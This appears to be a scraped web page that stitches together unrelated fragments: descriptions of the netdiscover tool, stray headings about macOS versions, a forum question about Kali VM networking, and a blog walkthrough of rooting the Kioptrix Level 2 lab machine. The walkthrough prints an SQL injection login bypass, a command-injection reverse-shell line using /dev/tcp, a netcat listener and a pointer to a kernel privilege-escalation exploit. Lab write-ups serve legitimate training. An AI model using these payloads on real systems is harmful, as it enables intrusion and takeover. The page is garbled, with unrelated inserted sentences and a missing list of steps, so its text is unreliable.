Netdiscover is a network address discovering tool that was developed mainly for those wireless networks without DHCP servers, though it also works on wired networks. It sends ARP requests and sniffs for replies. The netdiscover is a tool which is used to gather all the important information about the network. It gathers information about the connected clients and the router. As for the connected clients, we'll be able to know their IP, MAC address and the operating system, as well as the ports that they have open in their devices. Evidenced through the classic 'I'm a Mac' ads. A network discovery tool that sends ARP packets to a target device or IP range and sniffs the network for responses to identify the. Jul 27, 2015 The netdiscover utility will list all connected hosts on your local LAN. This is useful for scanning a network and determining which hosts are online. I used this command to scan an IP range starting with 192.168.0.1. [email protected]:$ sudo netdiscover -r 192.168.0.1 /24. 日期：2019-06-27 15:54:19 作者：Bay0net 介绍：在 mac os 下，如何安装 netdiscover 及基本使用方法.
Hey guys, in this post I’ll try and show you how to solve Level 2 Kioptrix machine. This is a first blog and there is heavy ongoing experimentation with Jekyll markup, so expect some aesthetical errors and uneven parts or padding.Without further a do, let’s start.
Run netdiscover to find the IP of our needed machine:
By digging around a bit I’ve found out that Kioptrix has been assined an IP of 192.168.0.115 !
Netdiscover Mac Os 10.13
As always it’s important to find as much information about our target as possible and therefore I decided to run an nmap Scan.
We get hits on different ports such as 22 [SSH], 80 [HTTP], 111 [RPC bind], 3306 [MYSQL] and more. Because our target is running an HTTP web server we put the IP in a browser which results in this page:
This seems like a custom, lazy-made login function. Normally I wouldn’t try and break login pages & their authentication in the first stage of enumeration, but because of the cheap look, an attempt for SQL injection won’t hurt. And indeed, a simple
' or 1=1# did the trick! Login has been successfully bypassed and we are presented with yet another challenge!
From enough completed challenges and CTFs I immediately recognized a possible code injection vulnerability. Let me explain. Our current webapp prompts us to enter a machine to ping. If you think about what’s happening inside our target, a command like this is parsed:
ping Entered_IP. Seems harmless, right? Well, no it is not! A character like “semicolon” (;) or “OR” can be used to append a terminator to the preset ping command which changes a query from
ping ENTERED_IP to
ping ENTERED_IP; malicious input. This effectively allows for code execution which makes us able to enter any command we like into our designated machine.
An attempt to estabilish a reverse shell with netcat was made, but as it appears, our target doesn’t have it. Luckily, there was another trick up my sleeve -
; bash -i >& /dev/tcp/192.168.0.213/4444 0>&1. This is just another way of telling a computer to connect back to you. Of course before doing this we need to ready our netcat listener.
nc -lvp 4444
lvp - listen, verbose, port
If you are interested in doing more research in this topic I highly suggest this article: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Feels good once you get that shell, doesn’t it? Non the less, we need to escalate our privileges and pwn the server as a whole - not just as apache. Time to snoop around!
There are 2 users in the home directory (john and harold), however both of them have restriced home folders which we can not access. A search for uncommon misconfigurations such as writable passwd or shadow file yielded no result. After a while during my system enumeration I spotted that the kernel is pretty outdated.
uname -a results in
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
Last compiled in 2007? This possibly opens up a privilege escalation vulnerability. After the finding, google search or exploitdb can be used for locating a corresponding kernel exploit. File of interest: https://www.exploit-db.com/exploits/9545/. Usually it’s a good practice to avoid kernel exploitation as this opens up many dangers such as crashing or corrupting the machine. Always make sure there are no other options before trying kernel exploitation!
I decided to download the code onto my machine, host it on apache 2 webserver and make the victim download it via the previously gained shell. Here are the steps:
Our machine (privesc.c is the exploit you downloaded):
Congratulations! The box has been rooted!
A solid box with a lot of hidden knowledge for new people entering infosec community. There are always things to learn no matter how many times you do them - same with this box. Personally I found this challenge quite easy, but enjoyed it non the less. My thanks goes to the creator for making such an awesome box.
Have any suggestions or feedback? Write it down below in the comments or send me a message on Twitter (@v3ded).
Netdiscover Mac Os High Sierra
Netdiscover Mac Os Mojave
Netdiscover Mac Os Mojave
Mac Os Catalina
When I run Netdiscover from Kali, it doesn't pick up anything at all. I do have internet though and if I run ifconfig my IP is not a 192.168.x.x, its a 10.x.x.x. If I switch to bridged or host-only, then I lose internet completely. I can't ping anything.
Why is this happening?
And are there any specific settings that I need to make sure to always have on my VM's so that they can see each other?